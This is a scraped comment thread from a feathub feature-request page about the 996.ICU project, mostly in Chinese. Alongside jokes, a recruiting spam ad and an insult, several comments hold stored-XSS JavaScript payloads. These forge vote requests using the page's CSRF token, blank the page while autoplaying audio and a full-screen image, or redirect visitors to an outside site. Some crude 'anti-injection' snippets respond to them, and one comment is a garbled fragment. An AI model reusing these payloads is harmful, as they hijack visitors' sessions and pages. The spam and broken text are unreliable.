LinXueyuanStdio/996.ICU

并夕夕

zzp0753 asked for this feature 10 months ago — 23 comments

zzp0753 commented 10 months ago

clearlove20 commented 10 months ago

这个名字带秀

netsman1030 commented 10 months ago

不是拼多多么

nimil commented 10 months ago

并西西可还行。。。

Ezio1212 commented 10 months ago

我面试的时候直接告知996,果断拒掉

mccree2 commented 10 months ago

你就是这个榜上最靓的仔

itinycheng commented 10 months ago

秒懂.

ostopuro commented 10 months ago

非996工作机会介绍群↑↑↑

intrhuting commented 10 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

666sbX commented 10 months ago

Hacked By Helen收徒QQ925999918

hellonainai commented 10 months ago

666sbX 你就是个煞笔

LinXueyuanStdio commented 10 months ago Admin

table{visibility: collapse;}

reinit commented 10 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 10 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

reinit commented 10 months ago

var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

xss67612 commented 10 months ago

document.body.innerText = '';

let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

LinXueyuanStdio commented 10 months ago Admin

img,svg,table{visibility: collapse;}

superzmy commented 10 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } 反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

ghostlo commented 10 months ago

哇,这么秀吗

996-ICU-Test-Xs commented 10 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

996-ICU-Test-Xs commented 10 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

996-ICU-Test-Xs commented 10 months ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = '';}

guotao commented 9 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>  。

Join the discussion!

Sign-in with GitHub to comment